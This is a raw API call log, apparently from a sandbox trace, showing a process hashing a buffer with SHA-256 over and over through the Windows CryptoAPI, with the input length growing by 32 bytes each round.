	[0208.255] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.255] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.255] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0208.255] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.255] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1240
	[0208.255] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b1240, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1240, pdwDataLen=0x129364) returned 1
	[0208.255] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.255] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.255] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.256] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.256] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0208.256] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.256] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1268
	[0208.256] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1268, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1268, pdwDataLen=0x129364) returned 1
	[0208.256] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.256] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.256] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.256] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.256] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0208.256] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.256] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1290
	[0208.256] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b1290, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1290, pdwDataLen=0x129364) returned 1
	[0208.256] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.257] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.257] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.257] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.257] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0208.257] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.257] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b12b8
	[0208.257] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b12b8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b12b8, pdwDataLen=0x129364) returned 1
	[0208.257] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.257] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.257] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.258] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.258] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0208.258] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b12e0
	[0208.258] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b12e0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b12e0, pdwDataLen=0x129364) returned 1
	[0208.258] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.258] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.258] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.258] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.258] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0208.258] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1308
	[0208.258] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1308, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1308, pdwDataLen=0x129364) returned 1
	[0208.258] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.258] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.258] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.259] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.259] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0208.259] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.259] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1330
	[0208.259] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b1330, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1330, pdwDataLen=0x129364) returned 1
	[0208.259] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.259] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.259] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.259] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.259] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0208.259] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.259] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1358
	[0208.259] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1358, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1358, pdwDataLen=0x129364) returned 1
	[0208.260] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.260] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.260] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.260] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.260] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0208.260] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.260] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1380
	[0208.260] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b1380, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1380, pdwDataLen=0x129364) returned 1
	[0208.260] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.260] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.260] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.355] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.355] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0208.355] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.355] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbfb8
	[0208.355] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cbfb8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cbfb8, pdwDataLen=0x129364) returned 1
	[0208.355] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.355] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.355] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.356] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.356] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0208.356] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.356] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbfe0
	[0208.356] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26cbfe0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cbfe0, pdwDataLen=0x129364) returned 1
	[0208.356] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.356] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.356] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.356] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.356] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0208.356] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.356] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb860
	[0208.356] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cb860, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cb860, pdwDataLen=0x129364) returned 1
	[0208.356] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.356] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.356] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.357] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.357] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0208.357] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.357] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb7e8
	[0208.357] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26cb7e8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cb7e8, pdwDataLen=0x129364) returned 1
	[0208.357] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.357] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.357] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.357] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.357] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0208.357] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.357] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb838
	[0208.357] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cb838, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cb838, pdwDataLen=0x129364) returned 1
	[0208.357] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.357] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.357] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.358] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.358] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0208.358] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.358] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb900
	[0208.358] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26cb900, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cb900, pdwDataLen=0x129364) returned 1
	[0208.358] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.358] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.358] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.358] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.358] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0208.358] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.358] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb748
	[0208.358] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cb748, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cb748, pdwDataLen=0x129364) returned 1
	[0208.358] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.358] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.359] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.359] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.359] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0208.359] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.359] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb770
	[0208.359] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26cb770, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cb770, pdwDataLen=0x129364) returned 1
	[0208.359] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.359] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.359] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.359] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.359] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0208.359] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.359] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb798
	[0208.359] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cb798, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cb798, pdwDataLen=0x129364) returned 1
	[0208.359] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.359] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.359] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.360] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.360] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0208.360] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.360] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b13a8
	[0208.360] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b13a8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b13a8, pdwDataLen=0x129364) returned 1
	[0208.360] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.360] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.360] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.360] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.360] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0208.360] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.360] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b13d0
	[0208.360] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b13d0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b13d0, pdwDataLen=0x129364) returned 1
	[0208.360] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.360] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.360] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.361] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.361] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0208.361] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.361] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b13f8
	[0208.361] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b13f8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b13f8, pdwDataLen=0x129364) returned 1
	[0208.361] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.361] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.361] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.361] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.361] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0208.361] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.361] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1420
	[0208.361] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1420, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1420, pdwDataLen=0x129364) returned 1
	[0208.361] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.361] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.361] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.362] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.362] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0208.362] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.362] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1448
	[0208.362] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1448, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1448, pdwDataLen=0x129364) returned 1
	[0208.362] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.362] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.362] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.362] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.362] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0208.362] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.362] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1470
	[0208.362] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1470, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1470, pdwDataLen=0x129364) returned 1
	[0208.362] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.362] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.362] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.363] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.363] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0208.363] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.363] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1498
	[0208.363] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1498, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1498, pdwDataLen=0x129364) returned 1
	[0208.363] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.363] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.363] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.363] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.363] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0208.363] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
